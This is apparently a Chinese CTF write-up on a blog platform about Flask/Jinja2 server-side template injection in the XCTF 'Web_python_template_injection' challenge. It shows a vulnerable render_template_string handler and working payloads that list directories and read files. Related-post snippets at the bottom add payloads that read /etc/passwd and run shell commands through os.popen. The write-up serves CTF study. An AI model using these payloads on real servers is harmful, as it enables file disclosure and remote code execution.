python template injection_XCTF-web_python_template_injection

最新推荐文章于 2025-05-04 18:37:39 发布

科研木头

最新推荐文章于 2025-05-04 18:37:39 发布

阅读量169

点赞数

CC 4.0 BY-SA版权

文章标签： python template injection

本文链接：https://blog.youkuaiyun.com/weixin_29906279/article/details/112052246

本文探讨了Flask应用中通过 SSTI (服务端模板注入)漏洞的实例，介绍了利用`render_template_string`函数时的潜在风险，并展示了如何通过恶意代码执行，如读取目录和文件内容。学习者分享了师傅的实践技巧和flag获取方法，重点回顾了ssti利用的策略。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

web_python_template_injection

这里涉及到flask的ssti漏洞(服务端模板注入)。

简单点说就是，在使用flask/jinja2的模板渲染函数render_template_string的同时，使用%s来替换字符串的时候，会把字符串中被{{}}包围内容当作变量解析。

例如：

@app.route('/')

def hello_world():

return 'Hello World!'

@app.errorhandler(404)

def page_not_found(e):

template = '''

%s Not Found!

''' % (request.url)

return render_template_string(template), 404

if __name__ == '__main__':

app.run()

请求：xxxxxxx.xxx/{{ 10*10 }}

响应：xxxxxx.xxx/{{100}} Not Found!

具体原理可以看看这篇介绍和这篇介绍，里面讲的比较清楚

这道题只用了下边俩方法：

查看文件(ls)

{{''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].listdir('./')}}这里的./是路径

文件读取：

{{''.__class__.__mro__[-1].__subclasses__()[40]('filename').read()}}这里的filename是文件名

贴一个师傅的使用方法总结

立个flag，这段学习期过了，回头来总结一下ssti的利用方法

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

科研木头

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

python_template_injection

Alita_lxz的博客

11-27

1370

python模板注入 Web_python_template_injection 文章内很多知识内容为转载大佬博客，都在文章开头处声明了文章原文地址事情要从一道CTF的题目说起打开题目，查看源代码，抓包，扫目录，什么也没发现，只有页面上一行字，python template injection，这个之前也没有做过类似的题目，满脸问号，只得去找wp，通过大佬的wp学习了很多题目大概这样做，先通过这条语句判断是否存在注入点 http://220.249.52.133:35728为我的题目地址 htt

攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection

闵行小鱼塘

10-12

1193

继续ctf的旅程，开始攻防世界web高手进阶区的9分题，本文是Web_python_flask_sql_injection的writeup

参与评论您还未登录，请先登录后发表或查看评论

web python template injection_攻防世界WEB高手进阶之python_template_injection

weixin_39705193的博客

12-10

174

python模板注入看了一堆文章，也不是看的很明白，反而把题目做出来了大概思路如下简单探测返回说明服务器执行了{{}}里面这一段代码利用{{ config.items() }}可以查看服务器的配置信息读取passwd信息{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}执行成功Python3代码执行下面这一段...

xctf Web_python_template_injection

最新发布

Furukawado的博客

05-04

1099

先看题，翻译了一下是模版注入，然后使用插件看一下发现是flask框架，注入点应该是这个。百度搜了一下大概有两个一个xss一个文件读取/命令执行有两篇较为详细的文章（虽然我没看太明白，但是确实详细，鄙人只会简单的开发知道flask框架下传值是需要{{}}的。那么先按照xss试一下，不可行但是可以发现有报错回显，开始尝试文件读取/命令执行结果如下开始找类的对象：{{''.__class__}}继续寻找基类：{{''.__class__.__mro__}}

2020.3.31 xctf(Web_python_template_injection)①

DSR446的博客

03-31

363

根据题意可知python模块注入测试payload：http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 {{''.__class__.__mro__[2].__subclasses__()}} {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].list...

攻防世界XCTF：Web_python_template_injection

末初 · mochu7

03-13

826

根据题意可知python模块注入测试payload：http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...

[XCTF]攻防世界Web_python_template_injection模板注入

qq_37301470的博客

11-20

3653

模板注入在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload： http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e

Python-模板注入

m0_51428325的博客

11-16

1603

何为模板注入？模板引擎可以让（网站）程序实现界面与数据分离，业务代码与逻辑代码的分离，哲大大提升了开发效率，良好的设计也是的代码重用变得更加容易。到那时模板引擎也拓宽了我们的攻击面，注入到模板中的代码可能会引发RCE或者XSS flask基础在学习SSTI之前，先把flask的运作流程搞明白，这样有利于更加快速的理解原理路由先看一段代码 from flask import flask @app.route('/index/') def hello_w.

攻防世界-web高手进阶区

zji

04-25

7056

文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结攻防世界-web高手进阶区提示：这里是记录web的题目，这里我基本不讲很多细节，请自行下载Burpsuite，web使用的等等工具。一、baby_web 非常的简单，bp抓包直接把1.php去掉后，就看的flag了。二、Training-WWW-Robots 非常的简单，点网页进去后，看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php，在

XCTF---Web_python_template_injection

weixin_45895555的博客

05-28

528

python template injection （对于出学的我来说）python模板注入不熟。所以花了一天的时间看了不少文章，也慢慢了解了Flask/Jinja2.输入后显示之后输入**{{config.items()}}是可以爆出一些内容的这里有些内容较深就不细究了，当然没法得到有利信息。之后有偿试爆了一下类（看了文章，师傅说<type ‘file’>**类，它是文件系统访问的关键但是还没找到方法，所以继续了一篇） ...

XCTF-Web-高手区-Web_python_template_injection

1stPeak's Blog

06-21

378

题目解题 1、题目提示为python模板注入猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入，就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板，Web应用可以把输入转换成特定的HTML文件或者email格式 2、测试一下 http://111.200.241.244:53038/{{1+1}} 经过该测试，说明存在SSTI 3、那么接下来可以使用相关payload进行验证（1）payload1 查看所有模块 http://111.200.

Web_python_template_injection（Python模块注入）

Welcome To Myon'Blog !

04-11

2131

Python的模块注入 flask/jinja2 常用于ssti的魔术方法获取基类的几种方法获取基本类的子类采用os模块的listdir函数来读取目录常用payload

【XCTF 攻防世界】WEB 高手进阶区 Web_python_template_injection

weixin_45844670的博客

08-31

328

打开链接只有一行字提示这是python模板注入也就是说可能是jinjia2、djingo、tornado中的一个模板这里涉及到flask的ssti漏洞（服务端模板注入）。简单点说就是，在使用flask/jinja2的模板渲染函数render_template_string的同时，使用%s来替换字符串的时候，会把字符串中被{{}}包围内容当作变量解析。举个例子请求：xxxxxx.xxx/{{ 10*10 }} 响应：xxxxx.xxx/{{100}} Not Found! ...

攻防世界-web-Web_python_template_injection

wuh2333的博客

06-16

2697

攻防世界，python模板注入

Web安全（Web_python_template_injection）

m0_56010012的博客

03-01

1946

可以知道题目是template injection题目。由此可知，说明存在“SSTI”。关于SSTI即服务端模板注入攻击，服务端接受用户输入，将其作为 Web 应用模板的一部分，渲染编译后执行了恶意内容，导致敏感信息泄露、代码执行等。常规的魔术方法，如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。 __class__ #返回type类型，查看对象的类型 __bases__ #返回tuple类型，列出该类的基类 __mro__ #返回tuple...

攻防世界 Web_python_template_injection（flask模版注入）

weixin_73399382的博客

07-06

1525

通过调用__class__.__mro__，可以获取该类的方法解析顺序（Method Resolution Order，MRO），它是一个元组，按照查找方法时的顺序列出了对象所属类及其父类。解析："".__class__.__mro__[2].__subclasses__()方法返回的是可用类（classes），而不是对象（objects）。综上所述，"".__class__.__mro__[2].__subclasses__()方法返回的是可用类（classes）SSTI与这个方法密不可分。

【攻防世界】Web_python_template_injection

2302_79800344的博客

04-01

1607

【代码】【攻防世界】Web_python_template_injection。

XCTF-WEB进阶-fakebook

02-28

### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台，在此环境中存在多个功能模块，包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现，该应用可能存在多种安全...